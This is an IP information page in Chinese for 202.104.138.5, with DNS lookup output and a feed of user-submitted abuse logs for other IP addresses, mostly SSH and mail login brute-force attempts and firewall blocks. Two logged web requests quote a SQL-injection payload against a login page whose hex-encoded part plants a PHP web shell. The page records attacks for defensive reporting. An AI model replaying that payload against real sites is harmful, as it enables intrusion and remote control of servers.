202.104.138.5 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 202.104.138.5
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34299
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;202.104.138.5.			IN	A

;; AUTHORITY SECTION:
.			128	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021800 1800 900 604800 86400

;; Query time: 58 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 18 23:56:01 CST 2022
;; MSG SIZE  rcvd: 106

HOST信息:

5.138.104.202.in-addr.arpa domain name pointer mx2.cmhk.com.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
5.138.104.202.in-addr.arpa	name = mx2.cmhk.com.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
46.161.27.87	attackbots	Aug 12 14:11:01 h2177944 kernel: \[3935626.844314\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=3773 PROTO=TCP SPT=48938 DPT=3303 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:11:01 h2177944 kernel: \[3935627.108175\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=47524 PROTO=TCP SPT=48938 DPT=3073 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:18:08 h2177944 kernel: \[3936053.519543\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=2822 PROTO=TCP SPT=48938 DPT=3305 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:22:06 h2177944 kernel: \[3936291.596728\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40 TOS=0x00 PREC=0x00 TTL=249 ID=18435 PROTO=TCP SPT=48938 DPT=3130 WINDOW=1024 RES=0x00 SYN URGP=0 Aug 12 14:26:09 h2177944 kernel: \[3936534.575964\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=46.161.27.87 DST=85.214.117.9 LEN=40	2019-08-12 20:46:57
91.67.105.22	attack	Aug 12 14:17:25 mail sshd\[3872\]: Invalid user wwl from 91.67.105.22\ Aug 12 14:17:27 mail sshd\[3872\]: Failed password for invalid user wwl from 91.67.105.22 port 52274 ssh2\ Aug 12 14:21:53 mail sshd\[3909\]: Invalid user nfs from 91.67.105.22\ Aug 12 14:21:55 mail sshd\[3909\]: Failed password for invalid user nfs from 91.67.105.22 port 60058 ssh2\ Aug 12 14:26:19 mail sshd\[3992\]: Invalid user insanos from 91.67.105.22\ Aug 12 14:26:21 mail sshd\[3992\]: Failed password for invalid user insanos from 91.67.105.22 port 6454 ssh2\	2019-08-12 20:37:12
113.76.59.38	attack	Aug 12 14:24:56 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.59.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:25:04 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.59.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:25:16 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.59.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:25:32 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.59.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 12 14:25:40 localhost postfix/smtpd\[26584\]: warning: unknown\[113.76.59.38\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2019-08-12 21:10:06
104.248.187.231	attack	Aug 12 14:26:16 v22018076622670303 sshd\[26266\]: Invalid user kathi from 104.248.187.231 port 50616 Aug 12 14:26:16 v22018076622670303 sshd\[26266\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.187.231 Aug 12 14:26:18 v22018076622670303 sshd\[26266\]: Failed password for invalid user kathi from 104.248.187.231 port 50616 ssh2 ...	2019-08-12 20:38:31
115.248.101.180	attack	Aug 12 13:50:43 mxgate1 postfix/postscreen[25732]: CONNECT from [115.248.101.180]:40978 to [176.31.12.44]:25 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25963]: addr 115.248.101.180 listed by domain cbl.abuseat.org as 127.0.0.2 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25964]: addr 115.248.101.180 listed by domain zen.spamhaus.org as 127.0.0.3 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25964]: addr 115.248.101.180 listed by domain zen.spamhaus.org as 127.0.0.4 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25965]: addr 115.248.101.180 listed by domain bl.spamcop.net as 127.0.0.2 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25966]: addr 115.248.101.180 listed by domain ix.dnsbl.xxxxxx.net as 127.0.0.2 Aug 12 13:50:43 mxgate1 postfix/dnsblog[25962]: addr 115.248.101.180 listed by domain b.barracudacentral.org as 127.0.0.2 Aug 12 13:50:49 mxgate1 postfix/postscreen[25732]: DNSBL rank 6 for [115.248.101.180]:40978 Aug x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=115.248.101.1	2019-08-12 20:45:54
120.52.152.15	attack	12.08.2019 12:28:28 Connection to port 500 blocked by firewall	2019-08-12 21:13:35
195.154.200.43	attackspam	Aug 12 14:25:58 ArkNodeAT sshd\[12363\]: Invalid user tomcat7 from 195.154.200.43 Aug 12 14:25:58 ArkNodeAT sshd\[12363\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=195.154.200.43 Aug 12 14:26:00 ArkNodeAT sshd\[12363\]: Failed password for invalid user tomcat7 from 195.154.200.43 port 38956 ssh2	2019-08-12 20:56:04
104.148.105.4	attackbots	104.148.105.4 - - [12/Aug/2019:08:25:50 -0400] "GET /user.php?act=login HTTP/1.1" 301 257 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:288:"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" ...	2019-08-12 21:00:46
104.248.41.37	attackbots	Lines containing failures of 104.248.41.37 Aug 12 10:15:41 nextcloud sshd[28123]: Invalid user parker from 104.248.41.37 port 48894 Aug 12 10:15:41 nextcloud sshd[28123]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.41.37 Aug 12 10:15:43 nextcloud sshd[28123]: Failed password for invalid user parker from 104.248.41.37 port 48894 ssh2 Aug 12 10:15:43 nextcloud sshd[28123]: Received disconnect from 104.248.41.37 port 48894:11: Bye Bye [preauth] Aug 12 10:15:43 nextcloud sshd[28123]: Disconnected from invalid user parker 104.248.41.37 port 48894 [preauth] Aug 12 10:48:25 nextcloud sshd[31389]: Invalid user admin from 104.248.41.37 port 47300 Aug 12 10:48:25 nextcloud sshd[31389]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.41.37 Aug 12 10:48:27 nextcloud sshd[31389]: Failed password for invalid user admin from 104.248.41.37 port 47300 ssh2 Aug 12 10:48:27 nextcloud sshd[31........ ------------------------------	2019-08-12 21:14:04
5.196.67.41	attackbotsspam	Aug 12 18:07:57 vibhu-HP-Z238-Microtower-Workstation sshd\[13781\]: Invalid user faina from 5.196.67.41 Aug 12 18:07:57 vibhu-HP-Z238-Microtower-Workstation sshd\[13781\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=5.196.67.41 Aug 12 18:07:59 vibhu-HP-Z238-Microtower-Workstation sshd\[13781\]: Failed password for invalid user faina from 5.196.67.41 port 34190 ssh2 Aug 12 18:12:49 vibhu-HP-Z238-Microtower-Workstation sshd\[14002\]: Invalid user manish from 5.196.67.41 Aug 12 18:12:49 vibhu-HP-Z238-Microtower-Workstation sshd\[14002\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=5.196.67.41 ...	2019-08-12 20:47:22
5.14.199.215	attackbotsspam	Honeypot attack, port: 23, PTR: 5-14-199-215.residential.rdsnet.ro.	2019-08-12 21:20:11
104.148.87.124	attack	104.148.87.124 - - [12/Aug/2019:08:25:22 -0400] "GET /user.php?act=login HTTP/1.1" 301 247 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:288:"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" ...	2019-08-12 21:20:44
60.173.9.72	attackbots	Aug 12 08:25:53 web1 postfix/smtpd[8172]: warning: unknown[60.173.9.72]: SASL LOGIN authentication failed: authentication failure ...	2019-08-12 20:57:34
195.231.69.40	attackbots	Aug 12 14:43:08 plex sshd[4683]: Invalid user oracle from 195.231.69.40 port 47082	2019-08-12 20:45:33
78.85.195.225	attackbotsspam	Honeypot attack, port: 5555, PTR: a225.sub195.net78.udm.net.	2019-08-12 21:09:35

最近上报的IP列表

202.104.142.5	202.104.25.155	202.104.25.152	202.105.101.121
202.105.181.129	202.105.161.176	202.105.183.125	202.105.230.146
202.102.79.83	202.106.151.32	202.106.156.101	202.106.195.131
202.106.93.170	202.106.171.134	202.107.10.169	202.107.147.17
202.107.151.26	202.107.192.78	202.106.182.71	202.107.200.66